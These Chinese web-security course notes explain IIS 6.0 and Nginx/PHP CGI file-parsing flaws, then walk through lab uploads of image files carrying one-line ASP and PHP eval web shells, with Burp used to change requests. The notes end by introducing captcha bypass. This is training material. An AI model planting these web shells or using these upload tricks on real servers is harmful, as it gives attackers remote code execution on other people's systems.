掌控安全Web安全微专业笔记 (23)

IIS5.1和IIS7.5无此漏洞。
IIS 6.0在处理含有特殊符号的文件路径时会出现逻辑错误,从而造成文件解析漏洞。这一漏洞有两种完全不同的利用方式:
test.asp;.jpg 他将当做asp进行解析
test.asp/123.jpg 他将当做asp进行解析

请求 /aaa.asp;xxxx.jpg

N1:从头部查找查找 ""号,获得 .asp;xxxx.jpg

N2:查找";"号,如果有则内存截断

N3:查找"http://www.likecs.com/",如果有则内存截断

最终,将保留下来 .asp 字符串,从META_SCRIPT_MAP脚本映射表里与扩展名匹配对比,并反馈给了asp.dll处理

IIS6.0解析漏洞(三)

文件夹名字如果是x.asp那么这个文件夹下任意文件都作asp执行

二、CGI解析漏洞

Nginx默认是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通过正则匹配设SCRIPT_FILENAME。
当访问这个URL时,$fastcgi_script_name会被设置“phpinfo.jpg/1.php”,然后构造成SCRIPT_FILENAME(绝对路径)传递给PHP CGI,如果开启了cgi.fix_pathinfo=1选项(这个默认值就是1,所以没有设置过就是开启),那么就会触发在PHP中的如下逻辑:
PHP会认为SCRIPT_FILENAME(绝对路径)是phpinfo.jpg,而1.php是PATH_INFO,所以就会phpinfo.jpg作为PHP文件来解析了.
也是一个逻辑问题,所以说我们只需要在正常的.jpg后面加/.php就可以成功的绕过解析
可以通过云悉识别:

这不是Nginx特有的漏洞,在IIS7.0、IIS7.5、Lighttpd等Web容器中也经常会出现这样的解析漏洞

三、靶场大闯关 1.IIS6.0解析漏洞(一)asp

将<%eval request("a")%>写入gif文件的第3行,将1.gif文件上传,用burp修改数据包

image-20201027195956860

image-20201027200100860

image-20201027200216684

在此文件夹下可以找到flag

2.IIS6.0解析漏洞(二)asp

将<%eval request("a")%>写入gif文件的第3行,将1.gif文件上传,用burp修改数据包

image-20201027201127102

image-20201027201220218

image-20201027201432432

在此文件夹下可以找到flag

3.IIS6.0解析漏洞(三)asp

将<%eval request("a")%>写入jpg文件最后,将1.jpg文件上传

image-20201027204253123

image-20201027204344307

4.CGI解析漏洞php

将<?php eval($_REQUEST[\'a\']);?>写入gif文件的第3行,将php.gif文件上传

image-20201027205533965

8-1验证码绕过、密码找回漏洞 一、验证码作用

验证码(CAPTCHA)是“Completely Automated Public Turing test to tell Computers and Humans Apart”(全自动区分计算机和人类的图灵测试)的缩写,是一种区分用户是计算机还是人的公共全自动程序。

可以防止:恶意破解密码、刷票、论坛灌水,有效防止某个黑客对某一个特定注册用户用特定程序暴力破解方式进行不断的登陆尝试,实际上用验证码是现在很多网站通行的方式,我们利用比较简易的方式实现了这个功能。

这个问题可以由计算机生成并评判,但是必须只有人类才能解答。由于计算机无法解答CAPTCHA的问题,所以回答出问题的用户就可以被认为是人类。

验证码五花八门,有中文字,纯数字,点击字符、数学运算……

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zzpdzz.html